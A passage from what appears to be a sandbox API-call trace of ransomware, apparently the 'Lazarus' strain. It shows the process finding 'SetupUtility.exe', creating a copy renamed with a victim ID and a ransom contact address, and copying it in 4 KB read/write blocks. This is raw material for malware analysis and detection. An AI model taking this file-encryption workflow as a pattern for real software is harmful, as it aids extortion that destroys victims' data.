(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0080.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0080.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.931] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0080.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0080.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0080.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0080.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0080.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0080.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0080.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0080.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0080.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0080.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0080.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0080.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0080.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0080.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0080.932] AreFileApisANSI () returned 1 [0080.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SetupUtility.exe", lpUsedDefaultChar=0x0) returned 39 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0080.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0080.932] AreFileApisANSI () returned 1 [0080.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0080.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d160 [0080.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x6d160, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 39 [0080.933] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0080.933] GetFileType (hFile=0x42c) returned 0x1 [0080.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0080.933] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0080.933] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0080.933] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0080.934] CloseHandle (hObject=0x42c) returned 1 [0080.934] AreFileApisANSI () returned 1 [0080.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0080.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6ce48 [0080.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 39 [0080.934] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0080.934] GetFileType (hFile=0x42c) returned 0x1 [0080.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0080.934] CloseHandle (hObject=0x42c) returned 1 [0080.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0080.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0080.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0080.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0080.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0080.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0080.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0080.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0080.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0080.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0080.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0080.935] AreFileApisANSI () returned 1 [0080.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d580 [0080.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x6d580, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 39 [0080.935] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758)) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0080.935] AreFileApisANSI () returned 1 [0080.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0080.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0080.936] GetLastError () returned 0x0 [0080.936] SetLastError (dwErrCode=0x0) [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dfc0 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c058 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0080.936] GetLastError () returned 0x0 [0080.936] SetLastError (dwErrCode=0x0) [0080.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x693f0 [0080.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75be8 [0080.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0080.936] AreFileApisANSI () returned 1 [0080.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0080.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xca) returned 0x73ff8 [0080.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x73ff8, cchWideChar=101 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 101 [0080.936] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0080.937] GetFileType (hFile=0x42c) returned 0x1 [0080.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73ff8 | out: hHeap=0x20000) returned 1 [0080.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0080.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0080.937] AreFileApisANSI () returned 1 [0080.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0080.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d2c0 [0080.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x6d2c0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 39 [0080.937] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0080.937] GetFileType (hFile=0x428) returned 0x1 [0080.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0080.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0080.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0080.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0080.938] GetLastError () returned 0x0 [0080.938] SetLastError (dwErrCode=0x0) [0080.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0080.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0080.938] GetLastError () returned 0x0 [0080.938] SetLastError (dwErrCode=0x0) [0080.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0080.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0080.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0080.938] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0080.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0080.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0080.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0080.942] GetLastError () returned 0x0 [0080.942] SetLastError (dwErrCode=0x0) [0080.942] GetLastError () returned 0x0 [0080.942] SetLastError (dwErrCode=0x0) [0080.942] GetLastError () returned 0x0 [0080.942] SetLastError (dwErrCode=0x0) [0080.943] GetLastError () returned 0x0 [0080.943] SetLastError (dwErrCode=0x0) [0080.943] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.943] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.944] GetLastError () returned 0x0 [0080.944] SetLastError (dwErrCode=0x0) [0080.944] GetLastError () returned 0x0 [0080.944] SetLastError (dwErrCode=0x0) [0080.944] GetLastError () returned 0x0 [0080.945] SetLastError (dwErrCode=0x0) [0080.945] GetLastError () returned 0x0 [0080.945] SetLastError (dwErrCode=0x0) [0080.945] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.945] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.945] GetLastError () returned 0x0 [0080.945] SetLastError (dwErrCode=0x0) [0080.945] GetLastError () returned 0x0 [0080.945] SetLastError (dwErrCode=0x0) [0080.945] GetLastError () returned 0x0 [0080.945] SetLastError (dwErrCode=0x0) [0080.945] GetLastError () returned 0x0 [0080.946] SetLastError (dwErrCode=0x0) [0080.946] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.946] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.946] GetLastError () returned 0x0 [0080.946] SetLastError (dwErrCode=0x0) [0080.946] GetLastError () returned 0x0 [0080.946] SetLastError (dwErrCode=0x0) [0080.946] GetLastError () returned 0x0 [0080.946] SetLastError (dwErrCode=0x0) [0080.946] GetLastError () returned 0x0 [0080.946] SetLastError (dwErrCode=0x0) [0080.947] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.947] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.947] GetLastError () returned 0x0 [0080.947] SetLastError (dwErrCode=0x0) [0080.947] GetLastError () returned 0x0 [0080.947] SetLastError (dwErrCode=0x0) [0080.947] GetLastError () returned 0x0 [0080.947] SetLastError (dwErrCode=0x0) [0080.947] GetLastError () returned 0x0 [0080.948] SetLastError (dwErrCode=0x0) [0080.948] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.948] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.948] GetLastError () returned 0x0 [0080.948] SetLastError (dwErrCode=0x0) [0080.948] GetLastError () returned 0x0 [0080.948] SetLastError (dwErrCode=0x0) [0080.948] GetLastError () returned 0x0 [0080.948] SetLastError (dwErrCode=0x0) [0080.948] GetLastError () returned 0x0 [0080.948] SetLastError (dwErrCode=0x0) [0080.949] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.949] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.949] GetLastError () returned 0x0 [0080.949] SetLastError (dwErrCode=0x0) [0080.949] GetLastError () returned 0x0 [0080.949] SetLastError (dwErrCode=0x0) [0080.949] GetLastError () returned 0x0 [0080.949] SetLastError (dwErrCode=0x0) [0080.949] GetLastError () returned 0x0 [0080.949] SetLastError (dwErrCode=0x0) [0080.949] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.950] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, 